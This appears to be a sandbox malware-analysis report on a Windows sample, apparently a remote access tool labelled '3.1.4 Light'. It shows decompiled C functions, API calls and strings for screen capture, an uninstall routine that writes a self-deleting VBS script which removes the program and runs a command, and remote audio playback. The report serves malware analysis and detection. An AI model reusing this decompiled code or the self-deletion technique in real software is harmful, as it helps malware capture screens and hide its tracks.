                                            • CreateCompatibleBitmap.GDI32(00000000,?,00000000), ref: 0040F132
                                            • DeleteDC.GDI32(00000000), ref: 0040F146
                                            • DeleteDC.GDI32(00000000), ref: 0040F149
                                            • DeleteObject.GDI32(?), ref: 0040F14D
                                            • SelectObject.GDI32(00000000,00000000), ref: 0040F157
                                            • DeleteDC.GDI32(00000000), ref: 0040F168
                                            • DeleteDC.GDI32(00000000), ref: 0040F16B
                                            • StretchBlt.GDI32(00000000,00000000,00000000,?,?,00000000,00000000,00000000,?,?,00CC0020), ref: 0040F1A7
                                            • GetCursorInfo.USER32(?,?,?), ref: 0040F1C2
                                            • GetIconInfo.USER32(?,?), ref: 0040F1D6
                                            • DeleteObject.GDI32(?), ref: 0040F1FB
                                            • DeleteObject.GDI32(?), ref: 0040F204
                                            • DrawIcon.USER32 ref: 0040F213
                                            • GetObjectA.GDI32(?,00000018,?), ref: 0040F227
                                            • LocalAlloc.KERNEL32(00000040,00000001,?,?), ref: 0040F28D
                                            • GlobalAlloc.KERNEL32(00000000,?,?,?), ref: 0040F2F6
                                            • GetDIBits.GDI32(00000000,?,00000000,?,00000000,00000000,00000000), ref: 0040F31A
                                            • DeleteDC.GDI32(?), ref: 0040F32D
                                            • DeleteDC.GDI32(00000000), ref: 0040F330
                                            • DeleteObject.GDI32(?), ref: 0040F335
                                            • GlobalFree.KERNEL32 ref: 0040F33F
                                            • DeleteObject.GDI32(?), ref: 0040F3E4
                                            • GlobalFree.KERNEL32 ref: 0040F3EB
                                            • DeleteDC.GDI32(?), ref: 0040F3FA
                                            • DeleteDC.GDI32(00000000), ref: 0040F3FD
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.912203016.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000002.00000002.912191905.0000000000400000.00000004.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912239074.0000000000449000.00000002.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912258452.000000000045F000.00000004.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912271649.0000000000464000.00000002.00000001.sdmp Download File
                                            Yara matches
                                            Similarity
                                            • API ID: Delete$Object$Info$CreateGlobal$AllocCompatibleFreeIconMonitor$BitmapBitsCursorDrawLocalSelectStretch
                                            • String ID: DISPLAY
                                            • API String ID: 517350757-865373369
                                            • Opcode ID: f7dd56a7dfcaf2563f6c913d37316e6162406a350d49b6515046b939cd422640
                                            • Instruction ID: d8c895037740aca4125a341e4eb12e73bd024c38028e731b7abf79735ca6a534
                                            • Opcode Fuzzy Hash: f7dd56a7dfcaf2563f6c913d37316e6162406a350d49b6515046b939cd422640
                                            • Instruction Fuzzy Hash: B5B16C75900219AFDB249FA4DC45BAEBBB9EF49300F00407EE909F7690DB74AD49CB58
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00407F80, Relevance: 38.7, APIs: 6, Strings: 16, Instructions: 237registryCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 95%
                                            			E00407F80(void* __eflags, char _a4) {
				signed int _v5;
				char _v32;
				char _v56;
				char _v80;
				char _v104;
				char _v128;
				char _v152;
				char _v176;
				short _v700;
				void* __ebx;
				void* __edi;
				void* __ebp;
				void* _t54;
				void* _t55;
				void* _t58;
				signed int _t62;
				void* _t63;
				void* _t79;
				void* _t80;
				void* _t93;
				void* _t94;
				signed char _t123;
				char* _t163;

				_t54 = E00401F26();
				_t55 = E00401F2E(0x461258);
				_t58 = E0040B8A0(E00401F2E(0x461210), "exepath",  &_v700, 0x208, _t55, _t54);
				_t216 = _t58;
				if(_t58 == 0) {
					GetModuleFileNameW(0,  &_v700, 0x208);
				}
				RegDeleteKeyA(0x80000001, E00401F2E(0x461210));
				_v5 = 1;
				_t62 = SetFileAttributesW( &_v700, 0x80);
				_t129 = 0x461228;
				asm("sbb bl, bl");
				_t123 =  ~_t62 & _v5;
				_t63 = E00405864(_t216);
				_t217 = _t63;
				if(_t63 != 0) {
					_t129 = 0x461228;
					SetFileAttributesW(L00404090(0x461228), 0x80);
				}
				E00406D5F(_t123,  &_v128, E004031DB(_t123,  &_v56, E00430F62(_t123, _t129, _t217, L"Temp")), 0, _t217, L"\\update.vbs");
				E004031D1();
				E00408507(_t123,  &_v32, L"On Error Resume Next\n", 0, _t217, E004031DB(_t123,  &_v56, L"Set fso = CreateObject(\"Scripting.FileSystemObject\")\n"));
				E004031D1();
				_t218 = _t123;
				if(_t123 != 0) {
					E00405B9B(E00406D5F(_t123,  &_v56, E00408507(_t123,  &_v80, L"while fso.FileExists(\"", 0, _t218, E004031DB(_t123,  &_v104,  &_v700)), 0, _t218, L"\")\n"));
					E004031D1();
					E004031D1();
					E004031D1();
				}
				E00405B9B(E00406D5F(_t123,  &_v104, E00406D5F(_t123,  &_v80, E004031DB(_t123,  &_v56, L"fso.DeleteFile \""), 0, _t218,  &_v700), 0, _t218, L"\"\n"));
				E004031D1();
				E004031D1();
				E004031D1();
				_t219 = _t123;
				if(_t123 != 0) {
					E00405B92(_t123,  &_v32, 0, L"wend\n");
				}
				_t79 = E00405864(_t219);
				_t220 = _t79;
				if(_t79 != 0) {
					E00405B9B(E00406D5F(0x45595c,  &_v104, E0040852B( &_v80, L"fso.DeleteFolder \"", _t220, 0x461228), 0, _t220, L"\"\n"));
					E004031D1();
					E004031D1();
				}
				_t80 = E004031DB(0x45595c,  &_v176, L"\"\"\", 0");
				E00405B9B(E00406D5F(0x45595c,  &_v104, E0040846D( &_v80, E004084E3(0x45595c,  &_v56, E004031DB(0x45595c,  &_v152, L"CreateObject(\"WScript.Shell\").Run \"cmd /c \"\""), _t220,  &_a4), _t80), 0, _t220, "\n"));
				E004031D1();
				E004031D1();
				E004031D1();
				E004031D1();
				E004031D1();
				_t163 =  &_v32;
				E00405B92(0x45595c, _t163, 0, L"fso.DeleteFile(Wscript.ScriptFullName)");
				_push(_t163);
				_t93 = L00404090( &_v128);
				_t94 = E00401F26();
				if(E00411661(L00404090( &_v32), _t94 + _t94, _t93) != 0 && ShellExecuteW(0, L"open", L00404090( &_v128), 0x45595c, 0x45595c, 0) > 0x20) {
					ExitProcess(0);
				}
				E004031D1();
				E004031D1();
				return E004031D1();
			}


























                                            0x00407f93
                                            0x00407f9b
                                            0x00407fc1
                                            0x00407fcb
                                            0x00407fcd
                                            0x00407fd8
                                            0x00407fd8
                                            0x00407feb
                                            0x00408003
                                            0x00408007
                                            0x00408012
                                            0x00408017
                                            0x00408019
                                            0x0040801c
                                            0x00408021
                                            0x00408023
                                            0x0040802a
                                            0x00408035
                                            0x00408035
                                            0x00408055
                                            0x0040805e
                                            0x00408079
                                            0x00408082
                                            0x00408087
                                            0x00408089
                                            0x004080bd
                                            0x004080c5
                                            0x004080cd
                                            0x004080d5
                                            0x004080d5
                                            0x0040810d
                                            0x00408115
                                            0x0040811d
                                            0x00408125
                                            0x0040812a
                                            0x0040812c
                                            0x00408136
                                            0x00408136
                                            0x00408149
                                            0x0040814e
                                            0x00408150
                                            0x00408175
                                            0x0040817d
                                            0x00408185
                                            0x00408185
                                            0x0040819a
                                            0x004081d9
                                            0x004081e1
                                            0x004081e9
                                            0x004081f1
                                            0x004081fc
                                            0x00408207
                                            0x00408211
                                            0x00408214
                                            0x00408219
                                            0x0040821d
                                            0x00408226
                                            0x00408244
                                            0x00408264
                                            0x00408264
                                            0x0040826d
                                            0x00408275
                                            0x00408288

                                            APIs
                                              • Part of subcall function 0040B8A0: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,00000000,00461210), ref: 0040B8BC
                                              • Part of subcall function 0040B8A0: RegQueryValueExA.ADVAPI32(00000000,00000000,00000000,00000000,00000208,?), ref: 0040B8D5
                                              • Part of subcall function 0040B8A0: RegCloseKey.ADVAPI32(00000000), ref: 0040B8E0
                                            • GetModuleFileNameW.KERNEL32(00000000,?,00000208), ref: 00407FD8
                                            • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 00407FEB
                                            • SetFileAttributesW.KERNEL32(?,00000080), ref: 00408007
                                            • SetFileAttributesW.KERNEL32(00000000,00000080), ref: 00408035
                                            • ShellExecuteW.SHELL32(00000000,open,00000000,0045595C,0045595C,00000000), ref: 00408258
                                            • ExitProcess.KERNEL32 ref: 00408264
                                              • Part of subcall function 0040852B: char_traits.LIBCPMT ref: 0040853B
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.912203016.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000002.00000002.912191905.0000000000400000.00000004.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912239074.0000000000449000.00000002.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912258452.000000000045F000.00000004.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912271649.0000000000464000.00000002.00000001.sdmp Download File
                                            Yara matches
                                            Similarity
                                            • API ID: File$Attributes$CloseDeleteExecuteExitModuleNameOpenProcessQueryShellValuechar_traits
                                            • String ID: """, 0$")$CreateObject("WScript.Shell").Run "cmd /c ""$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Temp$\YE$\YE$\update.vbs$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$wend$while fso.FileExists("
                                            • API String ID: 1918141659-426894540
                                            • Opcode ID: 1f03787ea0e41541dddcccd59b6482d0ea593e0fb1a731b9942f174b39a8ff96
                                            • Instruction ID: 6cbfc60f9b55543c8c91b994818547ce3f7901064b5a6cbaa312d73666e23afa
                                            • Opcode Fuzzy Hash: 1f03787ea0e41541dddcccd59b6482d0ea593e0fb1a731b9942f174b39a8ff96
                                            • Instruction Fuzzy Hash: A7713231B001086ACB44FB61EDA29EE77699F15305B60417FF8067B1E3EF382E49CA58
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00407CBF, Relevance: 38.7, APIs: 6, Strings: 16, Instructions: 216registryCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 95%
                                            			E00407CBF() {
				signed int _v5;
				char _v32;
				char _v56;
				char _v80;
				char _v104;
				char _v128;
				char _v152;
				short _v676;
				void* _t50;
				void* _t51;
				void* _t54;
				void* _t57;
				void* _t83;
				void* _t85;
				void* _t86;
				signed char _t113;
				signed char _t114;
				char* _t149;

				E0042B710(0,  &_v676, 0, 0x208);
				_t50 = E00401F26();
				_t51 = E00401F2E(0x461258);
				_t54 = E0040B8A0(E00401F2E(0x461210), "exepath",  &_v676, 0x208, _t51, _t50);
				_t202 = _t54;
				if(_t54 == 0) {
					GetModuleFileNameW(0,  &_v676, 0x208);
				}
				RegDeleteKeyA(0x80000001, E00401F2E(0x461210));
				_v5 = 1;
				_t57 = E00405864(_t202);
				_t203 = _t57;
				if(_t57 != 0) {
					SetFileAttributesW(L00404090(0x461228), 0x80);
				}
				_t113 =  ~(SetFileAttributesW( &_v676, 0x80));
				asm("sbb bl, bl");
				E00406D5F(_t113,  &_v152, E00411130( &_v80, E00410EE9( &_v32), _t203), 0, _t203, L".vbs");
				E004031D1();
				E00401F97();
				E004084E3(_t113,  &_v128, E00406D5F(_t113,  &_v32, E004031DB(_t113,  &_v80, E00430F62(_t113,  &_v32, _t203, L"Temp")), 0, _t203, "\\"), _t203,  &_v152);
				E004031D1();
				E004031D1();
				E00408507(_t113,  &_v56, L"On Error Resume Next\n", 0, _t203, E004031DB(_t113,  &_v32, L"Set fso = CreateObject(\"Scripting.FileSystemObject\")\n"));
				E004031D1();
				_t114 = _t113 & _v5;
				_t204 = _t114;
				if(_t114 != 0) {
					E00405B9B(E00406D5F(_t114,  &_v32, E00408507(_t114,  &_v80, L"while fso.FileExists(\"", 0, _t204, E004031DB(_t114,  &_v104,  &_v676)), 0, _t204, L"\")\n"));
					E004031D1();
					E004031D1();
					E004031D1();
				}
				E00405B9B(E00406D5F(_t114,  &_v104, E00406D5F(_t114,  &_v32, E004031DB(_t114,  &_v80, L"fso.DeleteFile \""), 0, _t204,  &_v676), 0, _t204, L"\"\n"));
				E004031D1();
				E004031D1();
				E004031D1();
				_t205 = _t114;
				if(_t114 != 0) {
					E00405B92(_t114,  &_v56, 0, L"wend\n");
				}
				_t83 = E00405864(_t205);
				_t206 = _t83;
				if(_t83 != 0) {
					E00405B9B(E00406D5F(0x45595c,  &_v104, E0040852B( &_v32, L"fso.DeleteFolder \"", _t206, 0x461228), 0, _t206, L"\"\n"));
					E004031D1();
					E004031D1();
				}
				_t149 =  &_v56;
				E00405B92(0x45595c, _t149, 0, L"fso.DeleteFile(Wscript.ScriptFullName)");
				_push(_t149);
				_t85 = L00404090( &_v128);
				_t86 = E00401F26();
				if(E00411661(L00404090( &_v56), _t86 + _t86, _t85) != 0) {
					ShellExecuteW(0, L"open", L00404090( &_v128), 0x45595c, 0x45595c, 0);
				}
				ExitProcess(0);
			}





















                                            0x00407cdb
                                            0x00407cea
                                            0x00407cf2
                                            0x00407d13
                                            0x00407d1b
                                            0x00407d1d
                                            0x00407d28
                                            0x00407d28
                                            0x00407d3b
                                            0x00407d46
                                            0x00407d51
                                            0x00407d5c
                                            0x00407d5e
                                            0x00407d6d
                                            0x00407d6d
                                            0x00407d82
                                            0x00407d89
                                            0x00407da2
                                            0x00407dab
                                            0x00407db3
                                            0x00407de8
                                            0x00407df1
                                            0x00407df9
                                            0x00407e14
                                            0x00407e1d
                                            0x00407e22
                                            0x00407e22
                                            0x00407e25
                                            0x00407e59
                                            0x00407e61
                                            0x00407e69
                                            0x00407e71
                                            0x00407e71
                                            0x00407ea9
                                            0x00407eb1
                                            0x00407eb9
                                            0x00407ec1
                                            0x00407ec6
                                            0x00407ec8
                                            0x00407ed2
                                            0x00407ed2
                                            0x00407ee5
                                            0x00407eea
                                            0x00407eec
                                            0x00407f11
                                            0x00407f19
                                            0x00407f21
                                            0x00407f21
                                            0x00407f2b
                                            0x00407f2e
                                            0x00407f33
                                            0x00407f37
                                            0x00407f40
                                            0x00407f5e
                                            0x00407f72
                                            0x00407f72
                                            0x00407f79

                                            APIs
                                              • Part of subcall function 0040B8A0: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,00000000,00461210), ref: 0040B8BC
                                              • Part of subcall function 0040B8A0: RegQueryValueExA.ADVAPI32(00000000,00000000,00000000,00000000,00000208,?), ref: 0040B8D5
                                              • Part of subcall function 0040B8A0: RegCloseKey.ADVAPI32(00000000), ref: 0040B8E0
                                            • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,?,?,?,C:\Users\user\Desktop\V8IB839cvz.exe,00461210,3.1.4 Light), ref: 00407D28
                                            • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 00407D3B
                                            • SetFileAttributesW.KERNEL32(00000000,00000080,?,?,?,?,?,C:\Users\user\Desktop\V8IB839cvz.exe,00461210,3.1.4 Light), ref: 00407D6D
                                            • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,C:\Users\user\Desktop\V8IB839cvz.exe,00461210,3.1.4 Light), ref: 00407D7B
                                            • ShellExecuteW.SHELL32(00000000,open,00000000,0045595C,0045595C,00000000), ref: 00407F72
                                            • ExitProcess.KERNEL32 ref: 00407F79
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.912203016.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000002.00000002.912191905.0000000000400000.00000004.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912239074.0000000000449000.00000002.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912258452.000000000045F000.00000004.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912271649.0000000000464000.00000002.00000001.sdmp Download File
                                            Yara matches
                                            Similarity
                                            • API ID: File$Attributes$CloseDeleteExecuteExitModuleNameOpenProcessQueryShellValue
                                            • String ID: ")$.vbs$3.1.4 Light$C:\Users\user\Desktop\V8IB839cvz.exe$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Temp$\YE$\YE$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$wend$while fso.FileExists("
                                            • API String ID: 1304132890-160383537
                                            • Opcode ID: ee5567005355fe771281d94b7cbfbcad4ef3fba1a1992b82068c31439be7712d
                                            • Instruction ID: d84beb742236595e7e42af5c11d245c5089cdb0891d577a357ede898fad408c6
                                            • Opcode Fuzzy Hash: ee5567005355fe771281d94b7cbfbcad4ef3fba1a1992b82068c31439be7712d
                                            • Instruction Fuzzy Hash: 11613D71F001086ACB04FB61ECA29FE77699F55305B60413FB8167B1D2EE3C2E09CA58
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 004108E5, Relevance: 38.7, APIs: 12, Strings: 10, Instructions: 185synchronizationCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 87%
                                            			E004108E5(void* __ecx, void* __edx, char _a4) {
				char _v24;
				char _v28;
				char _v52;
				char _v76;
				char _v100;
				char _v124;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t25;
				void* _t28;
				void* _t43;
				void* _t60;
				void* _t63;
				void* _t67;
				CHAR* _t89;
				void* _t109;
				CHAR* _t110;
				void* _t111;
				void* _t114;
				void* _t118;

				_t103 = __edx;
				_t67 = __ecx;
				_t109 = __edx;
				if(E00410B2B( &_a4, __ecx, __ecx) == 0xffffffff) {
					_t63 = L00404090( &_a4);
					_t103 = 0x30;
					E004053CE( &_a4, 0x30, _t111, E00411BB3( &_v28, 0x30, _t63));
					E004031D1();
				}
				_t25 = E00401F26();
				_t120 = _t25;
				if(_t25 == 0) {
					__eflags = PathFileExistsW(L00404090( &_a4));
					if(__eflags != 0) {
						goto L4;
					} else {
						E0040207E(_t67, _t114 - 0x18, 0x4554cc);
						_push(0xa8);
						E00401790(_t67, 0x461690, _t103, __eflags);
					}
				} else {
					_t60 = L00404090( &_a4);
					_t118 = _t114 - 0x18;
					E004020E6(_t67, _t118, _t103, _t120, _t109);
					E0041172B(_t60);
					_t114 = _t118 + 0x18;
					L4:
					_t28 = E00411130( &_v124, _t67, _t120);
					_t108 = E0040846D( &_v28, E00406D5F(_t67,  &_v76, E0040852B( &_v100, L"open \"", _t120,  &_a4), _t109, _t120, L"\" type "), _t28);
					E00406D5F(_t67,  &_v52, _t32, _t109, _t120, L" alias audio");
					E004031D1();
					E004031D1();
					E004031D1();
					E004031D1();
					mciSendStringW(L00404090( &_v52), 0, 0, 0);
					mciSendStringA("play audio", 0, 0, 0);
					_t115 = _t114 - 0x18;
					E0040207E(0, _t114 - 0x18, 0x4554cc);
					_push(0xa9);
					E00401790(0, 0x461690, _t32, 0);
					_t43 = CreateEventA(0, 1, 0, 0);
					while(1) {
						L5:
						 *0x460e14 = _t43;
						while(1) {
							_t122 = _t43;
							if(_t43 == 0) {
								break;
							}
							__eflags =  *0x460cdb; // 0x0
							if(__eflags != 0) {
								mciSendStringA("pause audio", 0, 0, 0);
								 *0x460cdb = 0;
							}
							__eflags =  *0x460cda; // 0x0
							if(__eflags != 0) {
								mciSendStringA("resume audio", 0, 0, 0);
								 *0x460cda = 0;
							}
							mciSendStringA("status audio mode",  &_v24, 0x14, 0);
							_t108 =  &_v24;
							_t110 = "stopped";
							_t89 = 0;
							while(1) {
								__eflags = ( *(_t108 + _t89) & 0x000000ff) -  *((intOrPtr*)(_t110 + _t89));
								if(( *(_t108 + _t89) & 0x000000ff) !=  *((intOrPtr*)(_t110 + _t89))) {
									break;
								}
								_t89 = _t89 + 1;
								__eflags = _t89 - 8;
								if(_t89 != 8) {
									continue;
								} else {
									SetEvent( *0x460e14);
								}
								break;
							}
							__eflags = WaitForSingleObject( *0x460e14, 0x1f4);
							if(__eflags != 0) {
								_t43 =  *0x460e14; // 0x0
							} else {
								CloseHandle( *0x460e14);
								_t43 = 0;
								goto L5;
							}
						}
						mciSendStringA("stop audio", 0, 0, 0);
						mciSendStringA("close audio", 0, 0, 0);
						E0040207E(0, _t115 - 0x18, 0x4554cc);
						_push(0xaa);
						E00401790(0, 0x461690, _t108, _t122);
						E004031D1();
						goto L21;
					}
				}
				L21:
				return E004031D1();
			}
























                                            0x004108e5
                                            0x004108ef
                                            0x004108f1
                                            0x004108ff
                                            0x00410904
                                            0x0041090a
                                            0x00410919
                                            0x00410921
                                            0x00410921
                                            0x00410928
                                            0x00410930
                                            0x00410932
                                            0x00410a1f
                                            0x00410a21
                                            0x00000000
                                            0x00410a27
                                            0x00410a31
                                            0x00410a36
                                            0x00410a40
                                            0x00410a40
                                            0x00410938
                                            0x00410938
                                            0x0041093d
                                            0x00410945
                                            0x0041094c
                                            0x00410951
                                            0x00410954
                                            0x0041095e
                                            0x00410991
                                            0x00410996
                                            0x0041099f
                                            0x004109a7
                                            0x004109af
                                            0x004109b7
                                            0x004109ca
                                            0x004109de
                                            0x004109e0
                                            0x004109ea
                                            0x004109ef
                                            0x004109f9
                                            0x00410a03
                                            0x00410a09
                                            0x00410a09
                                            0x00410a09
                                            0x00410ada
                                            0x00410ada
                                            0x00410adc
                                            0x00000000
                                            0x00000000
                                            0x00410a4a
                                            0x00410a50
                                            0x00410a5a
                                            0x00410a5c
                                            0x00410a5c
                                            0x00410a62
                                            0x00410a68
                                            0x00410a72
                                            0x00410a74
                                            0x00410a74
                                            0x00410a86
                                            0x00410a88
                                            0x00410a8b
                                            0x00410a90
                                            0x00410a92
                                            0x00410a96
                                            0x00410a99
                                            0x00000000
                                            0x00000000
                                            0x00410a9b
                                            0x00410a9c
                                            0x00410a9f
                                            0x00000000
                                            0x00410aa1
                                            0x00410aa7
                                            0x00410aa7
                                            0x00000000
                                            0x00410a9f
                                            0x00410abe
                                            0x00410ac0
                                            0x00410ad5
                                            0x00410ac2
                                            0x00410ac8
                                            0x00410ace
                                            0x00000000
                                            0x00410ace
                                            0x00410ac0
                                            0x00410aea
                                            0x00410af4
                                            0x00410b00
                                            0x00410b05
                                            0x00410b0f
                                            0x00410b17
                                            0x00000000
                                            0x00410b17
                                            0x00410a09
                                            0x00410b1c
                                            0x00410b2a

                                            APIs
                                            • mciSendStringW.WINMM(00000000,00000000,00000000,00000000), ref: 004109CA
                                            • mciSendStringA.WINMM(play audio,00000000,00000000,00000000), ref: 004109DE
                                            • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 00410A03
                                            • PathFileExistsW.SHLWAPI(00000000,00000000,00000000,?,00000000,0046103C), ref: 00410A19
                                            • mciSendStringA.WINMM(pause audio,00000000,00000000,00000000), ref: 00410A5A
                                            • mciSendStringA.WINMM(resume audio,00000000,00000000,00000000), ref: 00410A72
                                            • mciSendStringA.WINMM(status audio mode,?,00000014,00000000), ref: 00410A86
                                            • SetEvent.KERNEL32 ref: 00410AA7
                                            • WaitForSingleObject.KERNEL32(000001F4), ref: 00410AB8
                                            • CloseHandle.KERNEL32 ref: 00410AC8
                                            • mciSendStringA.WINMM(stop audio,00000000,00000000,00000000), ref: 00410AEA
                                            • mciSendStringA.WINMM(close audio,00000000,00000000,00000000), ref: 00410AF4
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.912203016.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000002.00000002.912191905.0000000000400000.00000004.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912239074.0000000000449000.00000002.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912258452.000000000045F000.00000004.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912271649.0000000000464000.00000002.00000001.sdmp Download File
                                            Yara matches
                                            Similarity
                                            • API ID: SendString$Event$CloseCreateExistsFileHandleObjectPathSingleWait
                                            • String ID: alias audio$" type $close audio$open "$pause audio$play audio$resume audio$status audio mode$stop audio$stopped
                                            • API String ID: 738084811-1354618412
                                            • Opcode ID: a46b5f104905db43f002f9fe435ff8094b4eb8f3e1f10338075fafeeb515aaed
                                            • Instruction ID: 1b25396326aec3a9c87bd3eb90d2fce3ea67488aaee696bff295f7cdc2033ca8
                                            • Opcode Fuzzy Hash: a46b5f104905db43f002f9fe435ff8094b4eb8f3e1f10338075fafeeb515aaed
                                            • Instruction Fuzzy Hash: C65184707002087BD714BB71DC92DBF3A2CDA51789B10413FF905661E2EEB85D8986AE
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 0043CE9D, Relevance: 27.4, APIs: 18, Instructions: 419COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 87%
                                            			E0043CE9D(signed int _a4, signed int _a8) {
				signed int _v0;
				signed char _v5;
				intOrPtr _v8;
				signed char _v9;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				intOrPtr _v24;
				signed int _v44;
				signed int _v92;
				signed int _v128;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t116;
				signed int _t119;
				signed int _t120;
				signed int _t122;
				signed int _t123;
				signed int _t126;
				signed int _t127;
				signed int _t131;
				signed int _t133;
				signed int _t136;
				signed int _t138;
				signed int _t139;
				signed int _t142;
				void* _t143;
				signed int _t148;
				signed int* _t150;
				signed int* _t156;
				signed int _t163;
				signed int _t165;
				signed int _t167;
				intOrPtr _t168;
				signed int _t173;
				signed int _t175;
				signed int _t176;
				signed int _t180;
				signed int _t185;
				intOrPtr* _t186;
				signed int _t191;
				signed int _t196;
				signed int _t197;
				signed int _t204;
				intOrPtr* _t205;
				signed int _t214;
				signed int _t215;
				signed int _t217;
				signed int _t218;
				signed int _t220;
				signed int _t221;
				signed int _t223;
				intOrPtr _t225;
				void* _t231;
				signed int _t233;
				void* _t236;
				signed int _t237;
				signed int _t238;
				void* _t241;
				signed int _t244;
				signed int _t246;
				void* _t252;
				signed int _t253;
				signed int _t254;
				void* _t260;
				void* _t262;
				signed int _t263;
				intOrPtr* _t267;
				intOrPtr* _t271;
				signed int _t274;
				signed int _t276;
				signed int _t280;
				signed int _t282;
				void* _t283;
				void* _t284;
				void* _t285;
				signed int _t286;
				signed int _t288;
				signed int _t290;
				signed int _t291;
				signed int* _t292;
				signed int _t298;
				signed int _t299;
				CHAR* _t300;
				signed int _t302;
				signed int _t303;
				WCHAR* _t304;
				signed int _t305;
				signed int _t306;
				signed int* _t307;
				signed int _t308;
				signed int _t310;
				void* _t316;
				void* _t317;
				void* _t318;
				void* _t320;
				void* _t321;
				void* _t322;
				void* _t323;

				_t217 = _a4;
				if(_t217 != 0) {
					_t286 = _t217;
					_t116 = E0042E730(_t217, 0x3d);
					_v16 = _t116;
					_t231 = _t285;
					__eflags = _t116;
					if(_t116 == 0) {
						L10:
						 *((intOrPtr*)(E00432914())) = 0x16;
						goto L11;
					} else {
						__eflags = _t116 - _t217;
						if(_t116 == _t217) {
							goto L10;
						} else {
							__eflags =  *((char*)(_t116 + 1));
							_t298 =  *0x4604c0; // 0x47b508
							_t120 = _t116 & 0xffffff00 |  *((char*)(_t116 + 1)) == 0x00000000;
							_v5 = _t120;
							__eflags = _t298 -  *0x4604cc; // 0x47b508
							if(__eflags == 0) {
								L87();
								_t298 = _t120;
								_t120 = _v5;
								_t231 = _t298;
								 *0x4604c0 = _t298;
							}
							_t218 = 0;
							__eflags = _t298;
							if(_t298 != 0) {
								L21:
								_t233 = _t286;
								_t122 = _v16 - _t233;
								_push(_t122);
								_push(_t233);
								L121();
								_v12 = _t122;
								__eflags = _t122;
								if(_t122 < 0) {
									L29:
									__eflags = _v5 - _t218;
									if(_v5 != _t218) {
										goto L12;
									} else {
										_t123 =  ~_t122;
										_v12 = _t123;
										_t27 = _t123 + 2; // 0x2
										_t236 = _t27;
										__eflags = _t236 - _t123;
										if(_t236 < _t123) {
											goto L11;
										} else {
											__eflags = _t236 - 0x3fffffff;
											if(_t236 >= 0x3fffffff) {
												goto L11;
											} else {
												_push(4);
												_push(_t236);
												_t299 = E0043D545(_t298);
												E00437795(_t218);
												_t320 = _t320 + 0x10;
												__eflags = _t299;
												if(_t299 == 0) {
													goto L11;
												} else {
													_t237 = _v12;
													_t286 = _t218;
													_t126 = _a4;
													 *(_t299 + _t237 * 4) = _t126;
													 *(_t299 + 4 + _t237 * 4) = _t218;
													goto L34;
												}
											}
										}
									}
								} else {
									__eflags =  *_t298 - _t218;
									if( *_t298 == _t218) {
										goto L29;
									} else {
										E00437795( *((intOrPtr*)(_t298 + _t122 * 4)));
										_t282 = _v12;
										__eflags = _v5 - _t218;
										if(_v5 != _t218) {
											while(1) {
												__eflags =  *(_t298 + _t282 * 4) - _t218;
												if( *(_t298 + _t282 * 4) == _t218) {
													break;
												}
												 *(_t298 + _t282 * 4) =  *(_t298 + 4 + _t282 * 4);
												_t282 = _t282 + 1;
												__eflags = _t282;
											}
											_push(4);
											_push(_t282);
											_t299 = E0043D545(_t298);
											E00437795(_t218);
											_t320 = _t320 + 0x10;
											_t126 = _t286;
											__eflags = _t299;
											if(_t299 != 0) {
												L34:
												 *0x4604c0 = _t299;
											}
										} else {
											_t126 = _a4;
											_t286 = _t218;
											 *(_t298 + _t282 * 4) = _t126;
										}
										__eflags = _a8 - _t218;
										if(_a8 == _t218) {
											goto L12;
										} else {
											_t238 = _t126;
											_t283 = _t238 + 1;
											do {
												_t127 =  *_t238;
												_t238 = _t238 + 1;
												__eflags = _t127;
											} while (_t127 != 0);
											_v12 = _t238 - _t283 + 2;
											_t300 = E004368EF(_t238 - _t283, _t238 - _t283 + 2, 1);
											_pop(_t241);
											__eflags = _t300;
											if(_t300 == 0) {
												L42:
												E00437795(_t300);
												goto L12;
											} else {
												_t131 = E00437B82(_t300, _v12, _a4);
												_t321 = _t320 + 0xc;
												__eflags = _t131;
												if(_t131 != 0) {
													_push(_t218);
													_push(_t218);
													_push(_t218);
													_push(_t218);
													_push(_t218);
